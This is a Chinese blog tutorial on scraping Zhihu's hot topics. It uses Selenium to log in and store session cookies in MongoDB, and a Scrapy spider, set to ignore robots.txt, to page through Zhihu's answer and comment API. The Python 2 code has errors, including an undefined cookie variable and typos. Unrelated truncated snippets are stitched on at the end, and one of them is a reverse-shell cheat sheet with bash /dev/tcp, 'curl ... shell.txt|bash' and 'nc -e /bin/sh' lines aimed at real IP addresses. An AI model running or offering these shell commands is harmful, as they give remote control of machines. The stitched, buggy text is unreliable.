今天给大家带来如何抓取知乎网站中最新热点栏目中的信息,获取里面的标题、内容、作者、网友评论、点赞量等信息。获取这些数据可以提取我们想要的内容进行数据分析和数据展示,建立一个自己的网站,将获取的内容进行展示!
# -*- coding: utf-8 -*-
import sys
import time
import pymongo
from selenium.webdriver import DesiredCapabilities
reload(sys)
sys.setdefaultencoding("utf-8")
if __name__ == '__main__':
# 连接mongo创建数据库和表为后面保存cookie做准备
client = pymongo.MongoClient(host="mongodb://192.168.98.5:27017")
dbs = client["zhihu"]
table = dbs["cookies"]
from selenium import webdriver
# browser = webdriver.Chrome()
# 加载chromeoptions 是一个方便控制 chrome 启动时属性的类
option = webdriver.ChromeOptions()
# 无头模式启动
option.add_argument("--headless")
# 谷歌文档提到需要加上这个属性来规避bug
option.add_argument("--disable-gpu")
# 取消沙盒模式
option.add_argument("--no-sanbox")
# 单进程运行
option.add_argument("--single-process")
# 设置网页大小
option.add_argument("--window-size=414,736")
# 添加useragent
option.add_argument("user-agent='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'")
browser = webdriver.Chrome(chrome_options=option)
try:
browser.get("https://www.zhihu.com/signin")
browser.find_element_by_css_selector(".SignFlow-accountInput.Input-wrapper input").send_keys(
"你的知乎账号")
time.sleep(1)
browser.find_element_by_css_selector(".SignFlow-password input").send_keys(
"你的知乎密码")
time.sleep(2)
browser.find_element_by_css_selector(
".Button.SignFlow-submitButton").click()
time.sleep(3)
zhihu_cookies = browser.get_cookies()
cookie_dict = {}
for cookie in zhihu_cookies:
cookie_dict[cookie['name']] = cookie['value']
table.insert(cookie_dict)
print "插入成功"
browser.close()
except Exception, e:
zhihu_cookies = browser.get_cookies()
cookie_dict = {}
for cookie in zhihu_cookies:
cookie_dict[cookie['name']] = cookie['value']
print cookie_dict
browser.close()
print e
ChromeOptions是Chrome 的一个类,她的作用是在启动chrome的时候进行一定的设置。如添加参数,阻止图片加载,阻止JavaScript执行 等动作。这些需要 selenium的 ChromeOptions 来帮助我们完成。
以上代码就是连接到mongo,创建好数据库和数据表,并用selenium和chrome结合以浏览器的行为去访问知乎网站,找到输入框,输入账号和密码获取到cookie。并进行提取存到mongo指定的数据库中,供后面的爬虫在发送请求的时候去访问和携带!
ROBOTSTXT_OBEY = False
LOG_LEVEL = "WARNING"
MONGO_URI = 'mongodb://xxx.xxx.xx.x:27017'
MONGODB_DBNAME = 'zhihu'
MONGODB_DBTABLE = 'zh_data'
MONGODB_COOKIE = 'cookies'
DOWNLOAD_DELAY = 0.8
# -*- coding: utf-8 -*-
import json
import os
import re
from datetime import datetime
from os import path
from urlparse import urljoin
import pymongo
import scrapy
import sys
from bs4 import BeautifulSoup
from copy import deepcopy
from selenium.webdriver import DesiredCapabilities
from zhihu import settings
reload(sys)
sys.setdefaultencoding('utf8')
from scrapy.loader import ItemLoader
class ZhihuSpider(scrapy.Spider):
name = "zh"
allowed_domains = ["www.zhihu.com"]
start_urls = ['https://www.zhihu.com/']
# question的第一页answer的请求url
start_url = "https://www.zhihu.com/hot"
question_detail_url = "https://www.zhihu.com/api/v4/questions/{0}/answers?include=data%5B%2A%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_collapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_count%2Ccan_comment%2Ccontent%2Ceditable_content%2Cvoteup_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2Cupdated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Crelationship.is_authorized%2Cis_author%2Cvoting%2Cis_thanked%2Cis_nothelp%3Bdata%5B%2A%5D.mark_infos%5B%2A%5D.url%3Bdata%5B%2A%5D.author.follower_count%2Cbadge%5B%2A%5D.topics&limit=5&offset={1}&sort_by=default"
q_detail_url = "https://www.zhihu.com/api/v4/articles/{0}/comments?include=data%5B*%5D.author%2Ccollapsed%2Creply_to_author%2Cdisliked%2Ccontent%2Cvoting%2Cvote_count%2Cis_parent_author%2Cis_author%2Calgorithm_right&order=normal&limit=20&offset=0&status=open"
headers = {
"HOST": "www.zhihu.com",
"Referer": "https://www.zhizhu.com",
'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/68.0.3440.106 Safari/537.36"
}
def __init__(self, param=None, *args, **kwargs):
super(ZhihuSpider, self).__init__(*args, **kwargs)
client = pymongo.MongoClient(host=settings.MONGO_URI)
dbs = client[settings.MONGODB_DBNAME]
self.table = dbs[settings.MONGODB_DBTABLE]
def parse(self, response):
section_list = response.xpath("//section[@class='HotItem']")
for section in section_list:
url = section.xpath(".//div[@class='HotItem-content']/a/@href").extract_first()
title = section.xpath(".//div[@class='HotItem-content']/a/@title").extract_first()
question_id = url.split("/")[-1]
if "question" in url:
detail_url = self.question_detail_url.format(question_id, 5)
yield scrapy.Request(
detail_url,
callback=self.parse_detail,
meta={"meta": deepcopy(url)}
)
else:
detail_url = self.q_detail_url.format(question_id)
yield scrapy.Request(
detail_url,
callback=self.q_parse_detail,
meta={"url": deepcopy(url), "title": title}
)
def parse_detail(self, response):
question_url = response.meta["meta"]
detail_url = response.url
all_dict = json.loads(response.text)
data_dict = all_dict["data"]
for data in data_dict:
item1 = {}
item1["question_url"] = question_url
item1["title"] = data["question"]["title"]
item1["content"] = data["content"]
item1["comment_count"] = data["comment_count"]
item1["voteup_count"] = data["voteup_count"]
p2 = re.compile(u'[^\u4e00-\u9fa5]') # 中文的编码范围是:\u4e00到\u9fa5
item1["content"] = p2.sub(r'', item1["content"])
print "===========>question_url:{0}".format(question_url)
print "===========>title:{0}".format(item1["title"])
print "===========>点赞量:{0}".format(item1["voteup_count"])
print "===========>评论量:{0}".format(item1["comment_count"])
print "===========>评论:{0}".format(item1["content"])
#self.table.insert(item1)
paging = all_dict["paging"]
if not paging["is_end"]:
next_url = paging["next"]
yield scrapy.Request(
next_url,
self.parse_detail,
meta={"meta": deepcopy(question_url)}
)
def q_parse_detail(self, response):
question_url = response.meta["url"]
title = response.meta["title"]
detail_url = response.url
all_dict = json.loads(response.text)
data_dict = all_dict["data"]
for data in data_dict:
content = data["content"]
comment_count = 0
vote_count = data["vote_count"]
p2 = re.compile(u'[^\u4e00-\u9fa5]') # 中文的编码范围是:\u4e00到\u9fa5
content = p2.sub(r'', content)
item2 = {}
item2["question_url"] = question_url
item2["title"] = title
item2["voteup_count"] = vote_count
item2["comment_count"] = comment_count
item2["content"] = content
print "===========>question_url:{0}".format(question_url)
print "===========>title:{0}".format(title)
print "===========>点赞量:{0}".format(vote_count)
print "===========>评论量:{0}".format(comment_count)
print "===========>评论:{0}".format(content)
#self.table.insert(item2)
paging = all_dict["paging"]
if not paging["is_end"]:
next_url = paging["next"]
yield scrapy.Request(
next_url,
self.q_parse_detail,
meta={"url": deepcopy(question_url), "title": deepcopy(title)}
)
# pass
def start_requests(self):
return [scrapy.Request(url=self.start_url, dont_filter=True, cookies=cookie_dict, headers=self.headers)]
以上代码很简单,scrapy拿到的第一个请求,也就是start_urls,引擎会从spider中拿到https://www.zhihu.com/hot这个请求交给调度器去入队列,执行调度。调度器将封装好的请求返回给引擎,引擎会将刚刚处理过得请求交给下载器去下载,下载器在下载中间件中可以对该请求添加cookie、useragent、代理等方式,并将下载好的response返回给spider中的parse,将产生新的url反复执行如上。
爬虫开始抓取数据,默认是直接访问知乎的热点栏目https://www.zhihu.com/hot,查看parse函数中代码。首先获取到热点栏目下的超链接,然后从超链接中提取出每一个作者的id号,供后面抓取每一个超链接下的评论、点赞等使用。需要注意的是这里会有两种类型的超链接,一种是提问的超链接,另一种是热点的描述。分别做处理后,去请求这些超链接。question_detail_url、q_detail_url这两个类变量是两个初始的json url。
每一个超链接下面都是json加载的数据,你往下拉的时候会发现一直刷新,这个时候我们使用google浏览器中的调试工具去捕捉,你会发现network中xhr里能够看到这样的信息
其实只要知道这个url,当你去访问它,它里面的内容就会提示你去访问新的url,你只需要提取去访问就ok。附上json中数据:
{“paging”:{“is_end”:true,“is_start”:true,“next”:“https://www.zhihu.com/answers/516374549/concerned_upvoters?limit=10\u0026offset=10",“previous”:“https://www.zhihu.com/answers/516374549/concerned_upvoters?limit=10\u0026offset=0”,“totals”:0},"data”:[]}
这条json数据中,告诉我们下一个url和上一个url的路径,以及是否是最后一页,我们可以根据json中的next这个field去访问url,当is_end这个field为false即表示数据已经提取完成。提取规则写完了后,大家可以将数据保存到指定的数据库即可,爬虫到此就结束了,谢谢大家!欢迎大家提问。
下面的TextArea的宽度和高度始终为父容器宽高的二分之一<s:TextArea id="txtArea" x="{this.width/2-txtArea.width/2}" y="{this.height/2-txtArea.height/2}" width="{this.width/2}" height="{this.height/2}"
POJ 3683 题目John is the only priest in his town. September 1st is the John’s busiest day in a year because there is an old legend in the town that the couple who get married on that day will be forever blessed b
源码地址:https://github.com/yjlch1016/hrmapp(包含SQL)
记录以防忘记//获取当前窗口var openView = plus.webview.currentWebview()//获取指定窗口var meet = plus.webview.getWebviewById("page/meet/meet.html");//关闭父窗口function closeOpenView() { //获取父窗口 var openView = plus.w...
bash -i >& /dev/tcp/ip/port 0>&1bash -i >& /dev/tcp/192.168.20.151/7777 0>&1curl http://174.1.73.154/shell.txt|bashnc -e /bin/sh ip portpython -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STRE
div{ position: absolute; left:0; right:0; margin:auto;}
from keras import bacend as ksess = K.get_session() frozen_graph_def = tf.graph_util.convert_variables_to_constants(sess,sess.graph_def,output_node_names=["output"])tf的node的name通过[tensor.name...
CoAP报文结构CoAP基于UDP的应用层协议,报文结构如下Ver 版本号占2bit,固定为01T 报文类型,占2bit,CoAP中有4种报文类型,如下类型描述T值CON报文Confirmable,需要被确认的报文T=00NON报文Non-Confirmable,不需要被确认的报文T=01ACK报文Acknowledgement,应答报文...
// 上传图片到微信服务器 @PostMapping("wx/upload.show") public ReturnJsonObject upload(@RequestParam("file") MultipartFile multipartFile ){ File file = null; String s = ""; try { file = File.createTempFile("tmp", null)...
一、前言。频域,更利于分析信号的成分,如:基波、谐波。在示波器、频谱仪中,经常用到频谱图。DFT和FFT都是时域变换到频域的工具,DFT适用于任意点数,而FFT一般是偶数点(基2、基4、分裂基等)而且速度更快。二、方案。由于FFT是统一处理若干个点,也就是若干个数据,所以先把数据缓存起来,计算好再输出。这里使用了两块RAM做输入、输出缓存器。蝶型运算主要由复数乘法器和复数加/减法器构成,其中复数乘法器可以由3个实数乘法器实现。旋转因子可以先扩大再存入ROM中,计算完成后.
最近刚刚使用codeblocks编译器,简单写了一个测试工程,内容如下://main.c#include <stdio.h>#include <stdlib.h>#include “function.h”int main(){printf(“Hello world!\n”);test();return 0;}//function.h#ifndef F...
基于SSM+Maven单号生成器:订单号:业务类型+yyyyMMddHHmmss+ 6位流水号。业务类型为任意2个英文字母,HHmmss为redis服务器的时间,6位流水号从1开始自增。KEY1:包名+业务类型+yyyyMMdd,48h过期 KEY2:包名+HHmmss,这里设置KEY2是为了防止宕机后 import java.text.SimpleDateFor...